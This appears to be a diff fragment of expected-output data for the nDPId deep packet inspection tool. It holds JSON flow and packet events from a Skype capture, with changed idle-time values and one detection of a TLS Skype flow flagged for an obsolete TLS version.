-00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1431970690890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690890,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtBpAAEAGkJfAqAEiW77YfchgMD4BM37JAAAAALAC\/\/8o9wAAAgQFtAEDAwUBAQgKPjJhMgAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1612,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1612,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1431970690890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690890,"pkt":"0NQSxnP1PBXCt3IOCABFAABAW\/1AAEAG6RnAqAEiW77YGMhhMD6A1I6YAAAAALAC\/\/+Z6gAAAgQFtAEDAwUBAQgKPjJhMgAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1431970690943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690943,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0q+NAAPUG49Fbvth9wKgBIjA+yGChcdZWATN+yoASH\/5orwAAAgQFoAEDAwQBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1431970690944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970690944,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoE35AAEAGMUzAqAEiW77YfchgMD4BM37KoXHWV1AQIACpaAAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1617,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1431970690945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970690945,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGUBNbvtgYwKgBIjA+yGFITqRBgNSOmaASOJAFAQAAAgQFrAQCCAoNH3OiPjJhMgEDAwk="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1618,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1431970690945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690945,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JxlAAEAGHgrAqAEiW77YGMhhMD6A1I6ZSE6kQoAQECxb9QAAAQEICj4yYWgNH3Oi"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1631,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691351,"flow_last_seen":1431970691351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691351,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1631,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1431970691351,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691351,"pkt":"0NQSxnP1PBXCt3IOCABFAABAcRRAAEAGRgjAqAEiUuBu8chil+9r2DTZAAAAALAC\/\/8RNAAAAgQFtAEDAwUBAQgKPjJi9wAAAAAEAgAA"} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1634,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1431970691419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970691419,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8K7FAAHIGWW9S4G7xwKgBIpfvyGLApWwfa9g02qASIAC5cwAAAgQFrAEDAwgEAggKAAcb7T4yYvc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1431970691419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970691419,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0AnRAAEAGtLTAqAEiUuBu8chil+9r2DTawKVsIIAQECz3yQAAAQEICj4yYzoABxvt"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1642,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691584,"flow_last_seen":1431970691584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691584,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1431970691584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691584,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+lxAAEAGSlXAqAEiW77YfchjMD4Tm3MJAAAAALAC\/\/8foQAAAgQFtAEDAwUBAQgKPjJj3QAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1431970691636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970691636,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0Yg5AAPUGLadbvth9wKgBIjA+yGMdRKLvE5tzCoASH\/4ZmQAAAgQFoAEDAwQBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1431970691636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970691636,"pkt":"0NQSxnP1PBXCt3IOCABFAAAosdpAAEAGku\/AqAEiW77YfchjMD4Tm3MKHUSi8FAQIABaUgAA"} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691783,"flow_last_seen":1431970691783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691783,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1431970691783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691783,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6ABAAEAGoz\/AqAEiTKehBshkTzK\/rUQGAAAAALAC\/\/\/JZwAAAgQFtAEDAwUBAQgKPjJkoAAAAAAEAgAA"} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1431970692055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970692055,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yyGRH9b\/zv61EB6AScSDahgAAAgQFrAQCCAq+r8ghPjJkoAEDAwc="} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1431970692055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970692055,"pkt":"0NQSxnP1PBXCt3IOCABFAAAop\/VAAEAG42LAqAEiTKehBshkTzK\/rUQHAAAAAFAEAADlHAAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690191,"flow_last_seen":1431970690191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690191,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1431970690191,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690191,"pkt":"0NQSxnP1PBXCt3IOCABFAABA15NAAEAGZ+bAqAEiF84hpshfAbtO4sWoAAAAALAC\/\/\/AXwAAAgQFtAEDAwUBAQgKPjJehwAAAAAEAgAA"} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1431970690235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970690235,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yF8ZBQnnTuLFqaASOJBGLgAAAgQFrAQCCArsPkNyPjJehwEDAwU="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1431970690235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690235,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z6tAAEAGb9rAqAEiF84hpshfAbtO4sWpGQUJ6IAQECydKQAAAQEICj4yXrLsPkNy"} +00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1579,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970690191,"flow_last_seen":1431970690235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431970690235,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1431970690890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690890,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtBpAAEAGkJfAqAEiW77YfchgMD4BM37JAAAAALAC\/\/8o9wAAAgQFtAEDAwUBAQgKPjJhMgAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1612,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1612,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1431970690890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970690890,"pkt":"0NQSxnP1PBXCt3IOCABFAABAW\/1AAEAG6RnAqAEiW77YGMhhMD6A1I6YAAAAALAC\/\/+Z6gAAAgQFtAEDAwUBAQgKPjJhMgAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1431970690943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690943,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0q+NAAPUG49Fbvth9wKgBIjA+yGChcdZWATN+yoASH\/5orwAAAgQFoAEDAwQBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1431970690944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970690944,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoE35AAEAGMUzAqAEiW77YfchgMD4BM37KoXHWV1AQIACpaAAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1617,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1431970690945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970690945,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGUBNbvtgYwKgBIjA+yGFITqRBgNSOmaASOJAFAQAAAgQFrAQCCAoNH3OiPjJhMgEDAwk="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1618,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1431970690945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970690945,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JxlAAEAGHgrAqAEiW77YGMhhMD6A1I6ZSE6kQoAQECxb9QAAAQEICj4yYWgNH3Oi"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1631,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691351,"flow_last_seen":1431970691351,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691351,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1631,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1431970691351,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691351,"pkt":"0NQSxnP1PBXCt3IOCABFAABAcRRAAEAGRgjAqAEiUuBu8chil+9r2DTZAAAAALAC\/\/8RNAAAAgQFtAEDAwUBAQgKPjJi9wAAAAAEAgAA"} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1634,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1431970691419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970691419,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8K7FAAHIGWW9S4G7xwKgBIpfvyGLApWwfa9g02qASIAC5cwAAAgQFrAEDAwgEAggKAAcb7T4yYvc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1431970691419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970691419,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0AnRAAEAGtLTAqAEiUuBu8chil+9r2DTawKVsIIAQECz3yQAAAQEICj4yYzoABxvt"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1642,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691584,"flow_last_seen":1431970691584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691584,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1431970691584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691584,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+lxAAEAGSlXAqAEiW77YfchjMD4Tm3MJAAAAALAC\/\/8foQAAAgQFtAEDAwUBAQgKPjJj3QAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1431970691636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970691636,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0Yg5AAPUGLadbvth9wKgBIjA+yGMdRKLvE5tzCoASH\/4ZmQAAAgQFoAEDAwQBAQQC"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1431970691636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970691636,"pkt":"0NQSxnP1PBXCt3IOCABFAAAosdpAAEAGku\/AqAEiW77YfchjMD4Tm3MKHUSi8FAQIABaUgAA"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970691783,"flow_last_seen":1431970691783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970691783,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1431970691783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970691783,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6ABAAEAGoz\/AqAEiTKehBshkTzK\/rUQGAAAAALAC\/\/\/JZwAAAgQFtAEDAwUBAQgKPjJkoAAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1431970692055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970692055,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yyGRH9b\/zv61EB6AScSDahgAAAgQFrAQCCAq+r8ghPjJkoAEDAwc="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1431970692055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970692055,"pkt":"0NQSxnP1PBXCt3IOCABFAAAop\/VAAEAG42LAqAEiTKehBshkTzK\/rUQHAAAAAFAEAADlHAAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1696,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1431970692292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970692292,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuAIoAAEARXlnAqAEirjGr4DLdfQsAGsvlfaACeL8XUJBpLDeRz+sEHWOI"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":1431970692292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970692292,"pkt":"0NQSxnP1PBXCt3IOCABFAAAug2AAAEAR1cjAqAEiUx8MrTLdXYMAGvz0faICfIT9gb6c5K1Sd5xbHa0C"} 
